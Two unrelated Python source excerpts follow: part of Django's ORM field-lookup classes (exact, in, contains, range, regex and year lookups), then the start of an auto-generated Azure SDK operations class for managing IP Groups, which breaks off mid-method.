if hasattr(self.rhs, '_prepare'):
return self.rhs._prepare(self.lhs.output_field)
if self.prepare_rhs and hasattr(self.lhs.output_field, 'get_prep_value'):
return self.lhs.output_field.get_prep_value(self.rhs)
return self.rhs
def get_db_prep_lookup(self, value, connection):
return ('%s', [value])
def process_lhs(self, compiler, connection, lhs=None):
lhs = lhs or self.lhs
if hasattr(lhs, 'resolve_expression'):
lhs = lhs.resolve_expression(compiler.query)
return compiler.compile(lhs)
def process_rhs(self, compiler, connection):
value = self.rhs
if self.bilateral_transforms:
if self.rhs_is_direct_value():
# Do not call get_db_prep_lookup here as the value will be
# transformed before being used for lookup
value = Value(value, output_field=self.lhs.output_field)
value = self.apply_bilateral_transforms(value)
value = value.resolve_expression(compiler.query)
# Due to historical reasons there are a couple of different
# ways to produce sql here. get_compiler is likely a Query
# instance and as_sql just something with as_sql. Finally the value
# can of course be just plain Python value.
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql'):
sql, params = compiler.compile(value)
return '(' + sql + ')', params
else:
return self.get_db_prep_lookup(value, connection)
def rhs_is_direct_value(self):
return not(
hasattr(self.rhs, 'as_sql') or
hasattr(self.rhs, 'get_compiler'))
def relabeled_clone(self, relabels):
new = copy(self)
new.lhs = new.lhs.relabeled_clone(relabels)
if hasattr(new.rhs, 'relabeled_clone'):
new.rhs = new.rhs.relabeled_clone(relabels)
return new
def get_group_by_cols(self):
cols = self.lhs.get_group_by_cols()
if hasattr(self.rhs, 'get_group_by_cols'):
cols.extend(self.rhs.get_group_by_cols())
return cols
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate or getattr(self.rhs, 'contains_aggregate', False)
@property
def is_summary(self):
return self.lhs.is_summary or getattr(self.rhs, 'is_summary', False)
class Transform(RegisterLookupMixin, Func):
"""
RegisterLookupMixin() is first so that get_lookup() and get_transform()
first examine self and then check output_field.
"""
bilateral = False
arity = 1
@property
def lhs(self):
return self.get_source_expressions()[0]
def get_bilateral_transforms(self):
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if self.bilateral:
bilateral_transforms.append(self.__class__)
return bilateral_transforms
class BuiltinLookup(Lookup):
def process_lhs(self, compiler, connection, lhs=None):
lhs_sql, params = super().process_lhs(compiler, connection, lhs)
field_internal_type = self.lhs.output_field.get_internal_type()
db_type = self.lhs.output_field.db_type(connection=connection)
lhs_sql = connection.ops.field_cast_sql(
db_type, field_internal_type) % lhs_sql
lhs_sql = connection.ops.lookup_cast(self.lookup_name, field_internal_type) % lhs_sql
return lhs_sql, list(params)
def as_sql(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
class FieldGetDbPrepValueMixin:
"""
Some lookups require Field.get_db_prep_value() to be called on their
inputs.
"""
get_db_prep_lookup_value_is_iterable = False
def get_db_prep_lookup(self, value, connection):
# For relational fields, use the output_field of the 'field' attribute.
field = getattr(self.lhs.output_field, 'field', None)
get_db_prep_value = getattr(field, 'get_db_prep_value', None)
if not get_db_prep_value:
get_db_prep_value = self.lhs.output_field.get_db_prep_value
return (
'%s',
[get_db_prep_value(v, connection, prepared=True) for v in value]
if self.get_db_prep_lookup_value_is_iterable else
[get_db_prep_value(value, connection, prepared=True)]
)
class FieldGetDbPrepValueIterableMixin(FieldGetDbPrepValueMixin):
"""
Some lookups require Field.get_db_prep_value() to be called on each value
in an iterable.
"""
get_db_prep_lookup_value_is_iterable = True
def get_prep_lookup(self):
prepared_values = []
if hasattr(self.rhs, '_prepare'):
# A subquery is like an iterable but its items shouldn't be
# prepared independently.
return self.rhs._prepare(self.lhs.output_field)
for rhs_value in self.rhs:
if hasattr(rhs_value, 'resolve_expression'):
# An expression will be handled by the database but can coexist
# alongside real values.
pass
elif self.prepare_rhs and hasattr(self.lhs.output_field, 'get_prep_value'):
rhs_value = self.lhs.output_field.get_prep_value(rhs_value)
prepared_values.append(rhs_value)
return prepared_values
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable of values. Use batch_process_rhs()
# to prepare/transform those values.
return self.batch_process_rhs(compiler, connection)
else:
return super().process_rhs(compiler, connection)
def resolve_expression_parameter(self, compiler, connection, sql, param):
params = [param]
if hasattr(param, 'resolve_expression'):
param = param.resolve_expression(compiler.query)
if hasattr(param, 'as_sql'):
sql, params = param.as_sql(compiler, connection)
return sql, params
def batch_process_rhs(self, compiler, connection, rhs=None):
pre_processed = super().batch_process_rhs(compiler, connection, rhs)
# The params list may contain expressions which compile to a
# sql/param pair. Zip them to get sql and param pairs that refer to the
# same argument and attempt to replace them with the result of
# compiling the param step.
sql, params = zip(*(
self.resolve_expression_parameter(compiler, connection, sql, param)
for sql, param in zip(*pre_processed)
))
params = itertools.chain.from_iterable(params)
return sql, tuple(params)
@Field.register_lookup
class Exact(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'exact'
@Field.register_lookup
class IExact(BuiltinLookup):
lookup_name = 'iexact'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params:
params[0] = connection.ops.prep_for_iexact_query(params[0])
return rhs, params
@Field.register_lookup
class GreaterThan(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'gt'
@Field.register_lookup
class GreaterThanOrEqual(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'gte'
@Field.register_lookup
class LessThan(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'lt'
@Field.register_lookup
class LessThanOrEqual(FieldGetDbPrepValueMixin, BuiltinLookup):
lookup_name = 'lte'
class IntegerFieldFloatRounding:
"""
Allow floats to work as query values for IntegerField. Without this, the
decimal portion of the float would always be discarded.
"""
def get_prep_lookup(self):
if isinstance(self.rhs, float):
self.rhs = math.ceil(self.rhs)
return super().get_prep_lookup()
@IntegerField.register_lookup
class IntegerGreaterThanOrEqual(IntegerFieldFloatRounding, GreaterThanOrEqual):
pass
@IntegerField.register_lookup
class IntegerLessThan(IntegerFieldFloatRounding, LessThan):
pass
class DecimalComparisonLookup:
def as_sqlite(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
# For comparisons whose lhs is a DecimalField, cast rhs AS NUMERIC
# because the rhs will have been converted to a string by the
# rev_typecast_decimal() adapter.
if isinstance(self.rhs, Decimal):
rhs_sql = 'CAST(%s AS NUMERIC)' % rhs_sql
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
@DecimalField.register_lookup
class DecimalGreaterThan(DecimalComparisonLookup, GreaterThan):
pass
@DecimalField.register_lookup
class DecimalGreaterThanOrEqual(DecimalComparisonLookup, GreaterThanOrEqual):
pass
@DecimalField.register_lookup
class DecimalLessThan(DecimalComparisonLookup, LessThan):
pass
@DecimalField.register_lookup
class DecimalLessThanOrEqual(DecimalComparisonLookup, LessThanOrEqual):
pass
@Field.register_lookup
class In(FieldGetDbPrepValueIterableMixin, BuiltinLookup):
lookup_name = 'in'
def process_rhs(self, compiler, connection):
db_rhs = getattr(self.rhs, '_db', None)
if db_rhs is not None and db_rhs != connection.alias:
raise ValueError(
"Subqueries aren't allowed across different databases. Force "
"the inner query to be evaluated using `list(inner_query)`."
)
if self.rhs_is_direct_value():
try:
rhs = set(self.rhs)
except TypeError: # Unhashable items in self.rhs
rhs = self.rhs
if not rhs:
raise EmptyResultSet
# rhs should be an iterable; use batch_process_rhs() to
# prepare/transform those values.
sqls, sqls_params = self.batch_process_rhs(compiler, connection, rhs)
placeholder = '(' + ', '.join(sqls) + ')'
return (placeholder, sqls_params)
else:
return super().process_rhs(compiler, connection)
def get_rhs_op(self, connection, rhs):
return 'IN %s' % rhs
def as_sql(self, compiler, connection):
max_in_list_size = connection.ops.max_in_list_size()
if self.rhs_is_direct_value() and max_in_list_size and len(self.rhs) > max_in_list_size:
return self.split_parameter_list_as_sql(compiler, connection)
return super().as_sql(compiler, connection)
def split_parameter_list_as_sql(self, compiler, connection):
# This is a special case for databases which limit the number of
# elements which can appear in an 'IN' clause.
max_in_list_size = connection.ops.max_in_list_size()
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.batch_process_rhs(compiler, connection)
in_clause_elements = ['(']
params = []
for offset in range(0, len(rhs_params), max_in_list_size):
if offset > 0:
in_clause_elements.append(' OR ')
in_clause_elements.append('%s IN (' % lhs)
params.extend(lhs_params)
sqls = rhs[offset: offset + max_in_list_size]
sqls_params = rhs_params[offset: offset + max_in_list_size]
param_group = ', '.join(sqls)
in_clause_elements.append(param_group)
in_clause_elements.append(')')
params.extend(sqls_params)
in_clause_elements.append(')')
return ''.join(in_clause_elements), params
class PatternLookup(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
# Assume we are in startswith. We need to produce SQL like:
# col LIKE %s, ['thevalue%']
# For python values we can (and should) do that directly in Python,
# but if the value is for example reference to other column, then
# we need to add the % pattern match to the lookup by something like
# col LIKE othercol || '%%'
# So, for Python values we don't need any special pattern, but for
# SQL reference values or SQL transformations we need the correct
# pattern added.
if hasattr(self.rhs, 'get_compiler') or hasattr(self.rhs, 'as_sql') or self.bilateral_transforms:
pattern = connection.pattern_ops[self.lookup_name].format(connection.pattern_esc)
return pattern.format(rhs)
else:
return super().get_rhs_op(connection, rhs)
@Field.register_lookup
class Contains(PatternLookup):
lookup_name = 'contains'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IContains(Contains):
lookup_name = 'icontains'
prepare_rhs = False
@Field.register_lookup
class StartsWith(PatternLookup):
lookup_name = 'startswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IStartsWith(PatternLookup):
lookup_name = 'istartswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class EndsWith(PatternLookup):
lookup_name = 'endswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class IEndsWith(PatternLookup):
lookup_name = 'iendswith'
prepare_rhs = False
def process_rhs(self, qn, connection):
rhs, params = super().process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
@Field.register_lookup
class Range(FieldGetDbPrepValueIterableMixin, BuiltinLookup):
lookup_name = 'range'
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs[0], rhs[1])
@Field.register_lookup
class IsNull(BuiltinLookup):
lookup_name = 'isnull'
prepare_rhs = False
def as_sql(self, compiler, connection):
sql, params = compiler.compile(self.lhs)
if self.rhs:
return "%s IS NULL" % sql, params
else:
return "%s IS NOT NULL" % sql, params
@Field.register_lookup
class Regex(BuiltinLookup):
lookup_name = 'regex'
prepare_rhs = False
def as_sql(self, compiler, connection):
if self.lookup_name in connection.operators:
return super().as_sql(compiler, connection)
else:
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.regex_lookup(self.lookup_name)
return sql_template % (lhs, rhs), lhs_params + rhs_params
@Field.register_lookup
class IRegex(Regex):
lookup_name = 'iregex'
class YearLookup(Lookup):
def year_lookup_bounds(self, connection, year):
output_field = self.lhs.lhs.output_field
if isinstance(output_field, DateTimeField):
bounds = connection.ops.year_lookup_bounds_for_datetime_field(year)
else:
bounds = connection.ops.year_lookup_bounds_for_date_field(year)
return bounds
class YearComparisonLookup(YearLookup):
def as_sql(self, compiler, connection):
# We will need to skip the extract part and instead go
# directly with the originating field, that is self.lhs.lhs.
lhs_sql, params = self.process_lhs(compiler, connection, self.lhs.lhs)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
start, finish = self.year_lookup_bounds(connection, rhs_params[0])
params.append(self.get_bound(start, finish))
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
def get_bound(self):
raise NotImplementedError(
'subclasses of YearComparisonLookup must provide a get_bound() method'
)
class YearExact(YearLookup, Exact):
lookup_name = 'exact'
def as_sql(self, compiler, connection):
# We will need to skip the extract part and instead go
# directly with the originating field, that is self.lhs.lhs.
lhs_sql, params = self.process_lhs(compiler, connection, self.lhs.lhs)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
try:
# Check that rhs_params[0] exists (IndexError),
# it isn't None (TypeError), and is a number (ValueError)
int(rhs_params[0])
except (IndexError, TypeError, ValueError):
# Can't determine the bounds before executing the query, so skip
# optimizations by falling back to a standard exact comparison.
return super().as_sql(compiler, connection)
bounds = self.year_lookup_bounds(connection, rhs_params[0])
params.extend(bounds)
return '%s BETWEEN %%s AND %%s' % lhs_sql, params
class YearGt(YearComparisonLookup):
lookup_name = 'gt'
def get_bound(self, start, finish):
return finish
class YearGte(YearComparisonLookup):
lookup_name = 'gte'
def get_bound(self, start, finish):
return start
class YearLt(YearComparisonLookup):
lookup_name = 'lt'
def get_bound(self, start, finish):
return start
class YearLte(YearComparisonLookup):
lookup_name = 'lte'
def get_bound(self, start, finish):
return finish
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class IpGroupsOperations(object):
"""IpGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
"""Gets the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param expand: Expands resourceIds (of Firewalls/Network Security Groups etc.) back referenced
by the IpGroups resource.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.IpGroup"
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'IpGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('IpGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.IpGroup"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.IpGroup"]
"""Creates or updates an ipGroups in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the create or update IpGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either IpGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_12_01.models.IpGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def update_groups(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
"""Updates tags of an IpGroups resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the update ipGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_groups.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.IpGroupListResult"]
"""Gets all IpGroups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
